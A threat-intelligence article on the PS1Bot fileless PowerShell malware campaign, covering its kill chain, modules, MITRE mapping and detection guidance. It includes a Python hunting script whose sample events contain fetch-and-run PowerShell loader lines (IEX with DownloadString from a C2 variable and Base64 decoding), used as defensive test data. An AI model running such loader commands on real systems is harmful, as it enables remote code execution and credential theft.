
New PS1Bot Malware Uses Fileless PowerShell for Data Theft

A new malvertising campaign is delivering PS1Bot, a modular malware framework that runs almost entirely in memory to avoid detection, Cisco Talos warns. It uses deceptive ads and SEO-poisoned downloads to deploy PowerShell loaders, which then pull modules for credential theft, keylogging, reconnaissance, and persistence — all without leaving major disk artifacts.

Security researchers on Wednesday warned that a stealthy malware called PS1Bot is being distributed through malicious ads and manipulated search results, using a multi-stage in-memory architecture to steal credentials, drain cryptocurrency wallets, and maintain persistence — all while leaving minimal forensic traces on infected systems.

Cisco Talos said the campaign has been active since early 2025, relying on ZIP archives that mimic popular search queries. Inside each archive is a JavaScript downloader that retrieves a scriptlet, which writes and launches a PowerShell loader. This loader contacts a command-and-control (C2) server, which delivers modules that never touch the disk.

Analysts Edmund Brumaghin and Jordyn Dunk described PS1Bot as a PowerShell/C# framework capable of antivirus discovery, screen capture, browser credential and wallet theft, keylogging, reconnaissance, and establishing persistence after reboot. Data theft is targeted: the malware scans for passwords, seed phrases, and crypto wallets, compresses the data, and exfiltrates it over HTTP.

Researchers also noted code and infrastructure overlaps with AHK Bot and activity linked to the Skitnet/Bossnet threat cluster, suggesting PS1Bot is part of a broader criminal toolkit.

“PS1Bot features a modular design … including information theft, keylogging, reconnaissance, and the establishment of persistent system access.” — Edmund Brumaghin & Jordyn Dunk, Cisco Talos.

“PS1Bot has been designed with stealth in mind, minimizing persistent artifacts … and incorporating in-memory execution techniques.” — Cisco Talos researchers.

“Malvertising at scale has impacted nearly one million devices in prior campaigns, showing how quickly threats can reach users via ads.” — Microsoft Threat Intelligence.


Deep Technical Analysis

Kill chain overview:

  • Delivered via malvertising/SEO poisoning, a ZIP file contains a JavaScript downloader with embedded VBScript.
  • This retrieves a JScript scriptlet that writes and executes a PowerShell loader (e.g., C:\ProgramData\ntu.ps1).
  • The loader derives a C2 URL from the system’s drive serial and uses Invoke-Expression (IEX) to run server-supplied PowerShell code entirely in memory.

Module architecture:

  • C# modules compiled at runtime via Add-Type perform: AV discovery (via WMI), screen capture, credential/wallet theft, keylogging, reconnaissance, and persistence.
  • Status is sent via HTTP GET parameters; bulk data is Base64-encoded and POSTed to the C2.

Data theft mechanics:

  • Targets browser credential stores, wallet extensions, and files containing passwords or seed phrases.
  • Uses keyword-based file hunts and exfiltrates seed phrases via HTTP GET requests in some cases.

Stealth tradecraft:

  • Screenshots saved briefly as BMP in %TEMP%, converted to JPEG in %APPDATA%, then deleted after upload.
  • Loading modules only in memory reduces the on-disk footprint while allowing rapid capability updates from the C2.

Lineage:

  • Overlaps with AHK Bot and Skitnet/Bossnet infrastructure point to experienced cybercriminal operators.

Detection & Hunting Playbook

Host telemetry (Windows):

  • Look for Microsoft-Windows-PowerShell/Operational Event ID 4104 (script block logging) entries containing Invoke-Expression and Add-Type calls, especially alongside large Base64 blobs.
  • Monitor WMI queries targeting antivirus software.
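An added hunting example, not code from the Talos report, that applies the host-telemetry heuristics above to constructed Event ID 4104 script-block records; the Base64 length threshold, the web-fetch pattern, the scoring weights and the sample events are assumptions:

```python
import re
from typing import Dict, List

# Indicators from the hunting notes: Invoke-Expression / IEX, Add-Type
# (runtime C# compilation) and large Base64 blobs inside 4104 ScriptBlockText.
IEX_RE = re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.IGNORECASE)
ADD_TYPE_RE = re.compile(r"\bAdd-Type\b", re.IGNORECASE)
# Assumed: a web fetch next to IEX is the "run server-supplied code" loader shape.
NET_FETCH_RE = re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|Invoke-RestMethod", re.IGNORECASE)
# Assumed threshold: a contiguous Base64 run of 200+ characters counts as "large".
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")

def score_script_block(script_text: str) -> Dict[str, object]:
    """Return matched indicators and a simple additive score for one 4104 ScriptBlockText."""
    hits: List[str] = []
    if IEX_RE.search(script_text):
        hits.append("invoke-expression")
    if ADD_TYPE_RE.search(script_text):
        hits.append("add-type")
    if NET_FETCH_RE.search(script_text):
        hits.append("web-fetch")
    if B64_BLOB_RE.search(script_text):
        hits.append("large-base64")
    # IEX together with a Base64 blob is the in-memory loader pattern; weight it higher.
    score = len(hits) + (2 if {"invoke-expression", "large-base64"} <= set(hits) else 0)
    return {"hits": hits, "score": score, "suspicious": score >= 2}

def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Filter 4104 events (dicts carrying 'ScriptBlockText') down to suspicious ones."""
    results: List[Dict[str, object]] = []
    for ev in events:
        verdict = score_script_block(ev.get("ScriptBlockText", ""))
        if verdict["suspicious"]:
            results.append({"ScriptBlockId": ev.get("ScriptBlockId"), **verdict})
    return results

# Constructed sample events (not real PS1Bot code) in the shape of 4104 log fields.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "b1", "ScriptBlockText": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"ScriptBlockId": "b2", "ScriptBlockText": "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('" + "QUFB" * 80 + "')))"},
    {"ScriptBlockId": "b3", "ScriptBlockText": "Add-Type -TypeDefinition $src; [Loader]::Run()"},
    {"ScriptBlockId": "b4", "ScriptBlockText": "Invoke-Expression (New-Object Net.WebClient).DownloadString($c2)"},
]

if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(r["ScriptBlockId"], r["score"], ",".join(r["hits"]))
```

Add-Type on its own scores below the threshold because it is common in benign administration scripts; tune the weights against your own baseline before alerting on them.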

Filesystem artifacts:

  • Ephemeral ntu.ps1 in ProgramData.
  • BMP→JPEG conversion pattern in %TEMP% / %APPDATA% followed by deletion.

Network analytics:

  • C2 requests embedding drive serials in URL paths.
  • Mixed GET/POST usage for metadata and payloads.

Threat intel:

  • Feed Talos’ published PS1Bot IoCs into SIEM/EDR blocklists.

Browser controls:

  • Block ads, enforce verified download policies, and monitor for ZIP files named after trending documents or software.

MITRE ATT&CK Mapping

  • Initial Access: T1189 Drive-by Compromise, T1190 Exploit Public-Facing Application (via poisoned sites).
  • Execution: T1059.001 PowerShell, T1059.007 JavaScript/JScript.
  • Defense Evasion: T1027 Obfuscated Files, T1218 Signed Binary Proxy Execution.
  • Discovery: T1518.001 Security Software Discovery.
  • Collection: T1113 Screen Capture, T1056.001 Keylogging, T1555 Credentials from Password Stores, T1552.004 Credentials in Files.
  • Exfiltration: T1041 Exfiltration over C2 Channel.
  • Persistence: T1547 Boot/Logon Autostart Execution.

Context & Background

Fileless and in-memory malware is increasingly common as attackers evade traditional file-based antivirus detection. PowerShell remains a top post-exploitation tool, prized for its flexibility and deep OS integration.

Malvertising, where malicious ads mimic legitimate download links, continues to be a high-ROI delivery vector — enabling threat actors to scale infections rapidly, often without needing to compromise popular websites directly.


Impact & Implications

Affected users: Individuals seeking free or pirated software, crypto tools, or common utilities are at highest risk.
Risks: Credential theft, cryptocurrency wallet drain, possible ransomware follow-on attacks.
Long-term: Could evolve into broader botnet campaigns using PS1Bot as an initial access platform.


Conclusion

PS1Bot demonstrates how modern threat actors are combining scalable initial access (malvertising) with fileless modular payloads to evade detection and prolong dwell time. Organizations should reinforce browser security, aggressively log and monitor PowerShell activity, and ensure their incident response teams can hunt for in-memory threats.
